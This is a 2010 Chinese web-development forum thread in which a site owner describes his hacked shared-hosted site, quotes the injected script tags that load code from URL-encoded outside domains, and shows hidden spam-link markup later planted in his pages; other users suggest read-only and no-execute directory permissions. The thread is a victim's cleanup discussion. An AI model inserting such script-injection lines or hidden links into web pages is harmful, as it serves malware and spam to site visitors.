标题:有研究木马的吗?
只看楼主
zfc123
Rank: 2
等 级:论坛游民
帖 子:136
专家分:39
注 册:2007-5-4
结帖率:84.62%
 问题点数:0 回复次数:8 
有研究木马的吗?
今天刚给网站加了个计数器功能,ftp以后,打开网站卡巴提示有木马,感到不大对劲,难道计数器程序被误报,但宁可信其有不可信其无,试了几遍均报木马,于是ftp下整个网站,下载的过程中卡巴连接提示20多个网页有木马,等下载完后,和本地的文本比对了一下,发现在网页下面多一行js代码。<script src=http://%65%2Ec%6Bt4%2Ecn></script><script src=http://%65.%74%6C%69n%65e%2Ecom.c%6E></script>全部替换后,不在提示木马了,这里还要赞一下卡巴,提前发现,尽早解决。

本人刚接触网站,对网站挂马不大了解,一直以为自己的小网站,没人会在意,没想到却中招了,想请教高手,怎么在保留后台功能的前提下,禁止空间文件和目录被修改。

我在网上搜了一下,木马就是利用图片上传功能上传的木马,现在已经禁止图片目录的执行权限了,木马文件我也找到了,是奥运专版网站维护工具(加强版)。
搜索更多相关主题的帖子: 木马 研究 
2010-05-12 13:20
gupiao175
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:40
帖 子:1787
专家分:7527
注 册:2007-6-27
得分:0 
你用的是自己的服务器,还是虚拟空间??

Q:1428196631,百度:开发地 即可找到我,有事请留言!
2010-05-12 14:06
zfc123
Rank: 2
等 级:论坛游民
帖 子:136
专家分:39
注 册:2007-5-4
得分:0 
虚拟空间,他有关闭目录asp执行权限功能,还有一个关闭所有目录上传功能,但不能用,因为关了后ftp都不能用。
2010-05-12 14:24
gupiao175
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:40
帖 子:1787
专家分:7527
注 册:2007-6-27
得分:0 
    一切设置都在服务器上,程序防黑写得再好,服务器防黑能力不行,一样会中标!估计整个服务器中了,而不仅仅是你一个WEB站点出问题!估计你买的虚拟空间防黑做得不够好,这种价格也比较便宜!

Q:1428196631,百度:开发地 即可找到我,有事请留言!
2010-05-12 15:45
zfc123
Rank: 2
等 级:论坛游民
帖 子:136
专家分:39
注 册:2007-5-4
得分:0 
是很便宜,还号称是BGP双线,后来我才知道,这个价格不大可能,我用的是动易编辑框,可能有漏洞。
2010-05-12 15:49
gupiao175
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:40
帖 子:1787
专家分:7527
注 册:2007-6-27
得分:0 
自己玩玩的网站无所未,被黑其实也是一种光荣!呵呵!
如果是有特殊要求的,可以和知名品牌空间商(比如万网等全国性的)签署协议,这样安全多了!

Q:1428196631,百度:开发地 即可找到我,有事请留言!
2010-05-12 17:23
hams
Rank: 12Rank: 12Rank: 12
等 级:贵宾
威 望:18
帖 子:912
专家分:3670
注 册:2008-7-30
得分:0 
把所有需要上传或修改的目录放到一个指定目录内,比如数据库和上传文件夹,把这个目录设为只能读写不能执行,其它的目录设为只能执行不能写

俺不高手,俺也是来学习的。
俺的意见不一定就对,当你不认同时请点忽视按钮。
当走到十字路口不知该如何走时,可在论坛问下路,但你若希望别人能一路把你送到目的地,显然是不现实的,因为别人也有自己要走的路。
2010-05-12 17:34
zfc123
Rank: 2
等 级:论坛游民
帖 子:136
专家分:39
注 册:2007-5-4
得分:0 
真疯了,现在木马居然在我的网页里加入了这些代码
程序代码:
<MARQUEE width=%221%22 height=%229%22>
<div style="position: absolute; top: -88px;left: -88px;"><a href="http://www. 

"target="_blank">591</a><a href="http://www.2427.html "target="_blank">09婚纱</a><a 

href="http://www. "target="_blank">19楼</a><a 

href="http://www. "target="_blank">591结婚网</a><a 

href="http://www. "target="_blank">80后婚纱照</a><a 

href="http://www. "target="_blank">80后结婚照</a><a 

href="http://www. "target="_blank">90后婚纱照</a><a 

href="http://www. "target="_blank">90后结婚照</a><a 

href="http://www. "target="_blank">99结婚网</a><a 

href="http://www. "target="_blank">babyface</a><a 

href="http://www. "target="_blank">bbf</a><a 

href="http://www. "target="_blank">dhc</a>
</div>
</MARQUEE>

2010-05-12 19:25
guolvbai
Rank: 1
等 级:新手上路
帖 子:1
专家分:0
注 册:2010-8-5
得分:0 
楼上这个叫 “挂黑链”
2010-08-05 23:43



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-306332-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.361488 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved